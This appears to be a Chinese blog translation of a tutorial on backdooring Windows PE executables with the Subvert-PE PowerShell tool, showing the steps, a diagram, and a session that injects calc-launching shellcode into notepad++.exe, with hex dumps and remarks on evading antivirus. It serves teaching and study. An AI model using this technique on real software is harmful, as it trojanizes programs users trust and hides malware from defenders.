<h3 id="Subvert-PE"><a href="#Subvert-PE" class="headerlink" title="Subvert-PE"></a>Subvert-PE</h3><hr>
<p>如果要对PE插入后门，通常执行以下步骤：1）计算第一个可执行节的空字节填充的偏移量；2）将模块入口点替换为该位置的偏移量；3）在该偏移量处写入我们的shellcode；4）将一个<strong>存根</strong>附加到该shellcode上，该<strong>存根</strong>会跳回到合法的入口点。 下图说明了执行流程。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">__________________________________________</span><br><span class="line">|                                          |</span><br><span class="line">|               PE Header                  |</span><br><span class="line">|                                          |</span><br><span class="line">|                                          |</span><br><span class="line">|           Entry Point Offset             | ----&gt;----</span><br><span class="line">|                                          |          |</span><br><span class="line">|__________________________________________|          |</span><br><span class="line">|                                          |          |</span><br><span class="line">|               ..........                 |          |</span><br><span class="line">|__________________________________________|          |</span><br><span class="line">|                                          |          |</span><br><span class="line">|         First Executable Section         |          |</span><br><span class="line">|            (Probably .text)              |          |</span><br><span class="line">|                                          |          |</span><br><span class="line">|          Legitimate Entry Point          |&lt;---------|----</span><br><span class="line">|                                          |          |    |</span><br><span class="line">|                                          |          |    |</span><br><span class="line">|                                          |          |    |</span><br><span class="line">|----[Section End - null-byte Padding]-----|          |    |</span><br><span class="line">|                                          |          |    |</span><br><span class="line">|                Shellcode                 |          |    |</span><br><span class="line">|\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\|  ---&lt;----     |</span><br><span class="line">|\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\| |             |</span><br><span class="line">|\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\| |             |</span><br><span class="line">|\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\| |             |</span><br><span class="line">|\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\| |             |</span><br><span class="line">|            Far Jump back to              |  -------&gt;-----</span><br><span class="line">|         Legitimate Entry Point           |</span><br><span class="line">|__________________________________________|</span><br></pre></td></tr></table></figure>

<p>正如在简介中所述，执行这些步骤并不复杂。为此，我创建了Subvert-PE，它支持x86和x64，并动态地为PE镜像插入后门。 Subvert-PE由SkyLined编写，包含shellcode，可启动calc。有关shellcode的更多详细信息，请参见<a href="https://code.google.com/p/win-exec-calc-shellcode/" target="_blank" rel="noopener">此处</a>。</p>
<p>来看一个例子：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br></pre></td><td class="code"><pre><span class="line">PS C:\Users\b33f&gt; . .\ToolKit\Subvert-PE.ps1</span><br><span class="line"></span><br><span class="line">PS C:\Users\b33f&gt; Get-Help Subvert-PE -Full</span><br><span class="line"></span><br><span class="line">NAME</span><br><span class="line">    Subvert-PE</span><br><span class="line"></span><br><span class="line">SYNOPSIS</span><br><span class="line">    Inject shellcode into a PE image while retaining the PE functionality.</span><br><span class="line"></span><br><span class="line">    Author: Ruben Boonen (@FuzzySec)</span><br><span class="line">    License: BSD 3-Clause</span><br><span class="line">    Required Dependencies: None</span><br><span class="line">    Optional Dependencies: None</span><br><span class="line"></span><br><span class="line">SYNTAX</span><br><span class="line">    Subvert-PE -Path &lt;String&gt; [-Write] [&lt;CommonParameters&gt;]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">DESCRIPTION</span><br><span class="line">    Parse a PE image, inject shellcode at the end of the code section and dynamically patch the entry</span><br><span class="line">    point. After the shellcode executes, program execution is handed back over to the legitimate PE entry</span><br><span class="line">    point.</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">PARAMETERS</span><br><span class="line">    -Path &lt;String&gt;</span><br><span class="line">        Path to portable executable.</span><br><span class="line"></span><br><span class="line">        Required?                    true</span><br><span class="line">        Position?                    named</span><br><span class="line">        Default value</span><br><span class="line">        Accept pipeline input?       false</span><br><span class="line">        Accept wildcard characters?</span><br><span class="line"></span><br><span class="line">    -Write [&lt;SwitchParameter&gt;]</span><br><span class="line">        Inject shellcode and overwrite the PE. If omitted simply display &quot;Entry Point&quot;, &quot;Preferred Image</span><br><span class="line">        Base&quot; and dump the memory at the null-byte location.</span><br><span class="line"></span><br><span class="line">        Required?                    false</span><br><span class="line">        Position?                    named</span><br><span class="line">        Default value</span><br><span class="line">        Accept pipeline input?       false</span><br><span class="line">        Accept wildcard characters?</span><br><span class="line"></span><br><span class="line">    &lt;CommonParameters&gt;</span><br><span class="line">        This cmdlet supports the common parameters: Verbose, Debug,</span><br><span class="line">        ErrorAction, ErrorVariable, WarningAction, WarningVariable,</span><br><span class="line">        OutBuffer and OutVariable. For more information, type,</span><br><span class="line">        &quot;get-help about_commonparameters&quot;.</span><br><span class="line"></span><br><span class="line">INPUTS</span><br><span class="line"></span><br><span class="line">OUTPUTS</span><br><span class="line"></span><br><span class="line">    -------------------------- EXAMPLE 1 --------------------------</span><br><span class="line"></span><br><span class="line">    C:\PS&gt;Subvert-PE -Path C:\Path\To\PE.exe</span><br><span class="line"></span><br><span class="line">    -------------------------- EXAMPLE 2 --------------------------</span><br><span class="line"></span><br><span class="line">    C:\PS&gt;Subvert-PE -Path C:\Path\To\PE.exe -Write</span><br><span class="line"></span><br><span class="line">RELATED LINKS</span><br><span class="line">     http:&#x2F;&#x2F;www.fuzzysecurity.com&#x2F;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">PS C:\Users\b33f&gt; Subvert-PE -Path &#39;C:\Program Files\Notepad++\notepad++.exe&#39; -Write</span><br><span class="line"></span><br><span class="line">Legitimate Entry Point Offset:   0x000B7159</span><br><span class="line">Preferred PE Image Base:         0x00400000</span><br><span class="line"></span><br><span class="line">Null-Byte Padding dump:</span><br><span class="line"></span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line"></span><br><span class="line">Modified Entry Point Offset:     0x000DA6B6</span><br><span class="line">Inject Far JMP:                  0xe9fffdca54</span><br><span class="line"></span><br><span class="line">Null-Byte Padding After:</span><br><span class="line"></span><br><span class="line">31 D2 52 68 63 61 6C 63 89 E6 52 56 64 8B 72 30 8B 76 0C 8B 76</span><br><span class="line">AD 8B 30 8B 7E 18 8B 5F 3C 8B 5C 1F 78 8B 74 1F 20 01 FE 8B 4C</span><br><span class="line">24 01 F9 42 AD 81 3C 07 57 69 6E 45 75 F5 0F B7 54 51 FE 8B 74</span><br><span class="line">1C 01 FE 03 3C 96 FF D7 E9 54 CA FD FF 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br></pre></td></tr></table></figure>

<p>从屏幕截图中我们看到，Notepad++正常启动了，不仅如此，还启动了calc.exe！<br><img src="http://www.fuzzysecurity.com/tutorials/images/PE_9_Big.png" alt="tutorials"></p>
<p>下面的屏幕截图显示了在Windows 7 Professional 32位和Windows 8 Enterprise 64位上的一些shellcode注入示例。</p>
<p><img src="http://www.fuzzysecurity.com/tutorials/images/PE_10_Big.png" alt="tutorials"></p>
<p><img src="http://www.fuzzysecurity.com/tutorials/images/PE_11_Big.png" alt="tutorials"></p>
<h5 id="注意："><a href="#注意：" class="headerlink" title="注意："></a>注意：</h5><p>1）在32位PE可执行文件上，脚本的成功率约为90％；而在64位上，下降到大约50％。这是因为对于64 位PE，空字节填充要小得多。根据经验，应该在不带“-Write”标志的情况下执行脚本，如果shellcode有足够的空间插入，那么它可以成功执行的可能性就很大。</p>
<p>2）shellcode不能包含退出函数，因为我们需要保留程序正常执行流。并且，shellcode不能在执行时解包，因为PE代码段不可写，并且在少数情况下测试用例中，PE需要初始注册表值才能正常运行，shellcode执行后需要恢复这些注册表值。</p>
<p>3）二进制文件注入签名会使签名无效，但这可能只是在处理取证时要考虑的问题。 此外，由于我们将shellcode隐藏在可执行文件中，因此杀毒软件不知道发生了什么，让程序运行。 但我发现Comodo注意到PE被更改，它隔离了可执行文件，但仍然允许shellcode执行。它可能检测到入口点被篡改。</p>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls" data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
                <ul id="audio-list" style="display:none">
                    
                        
                            <li title='0' data-url='http://link.hhtjim.com/163/5146554.mp3'></li>
                        
                    
                        
                            <li title='1' data-url='http://link.hhtjim.com/qq/001faIUs4M2zna.mp3'></li>
                        
                    
                </ul>
            
        </div>
        
    <div id='gitalk-container' class="comment link"
        data-ae='false'
        data-ci=''
        data-cs=''
        data-r=''
        data-o=''
        data-a=''
        data-d='false'
    >查看评论</div>


    </div>
    
</div>


    </div>
</div>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginModelPath":"assets/","model":{"jsonPath":"live2d-little-little-black"},"display":{"width":150,"height":300,"position":"right"},"mobile":{"show":false},"log":false,"pluginJsPath":"lib/","pluginRootPath":"live2dw/","tagMode":false});</script></body>

<script src="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>


<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/diaspora.js"></script>


<link rel="stylesheet" href="/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/photoswipe/default-skin/default-skin.css">


<script src="/photoswipe/photoswipe.min.js"></script>
<script src="/photoswipe/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>




</html>
<!-- 页面点击 -->
<script type="text/javascript" src="/js/click.js"></script>
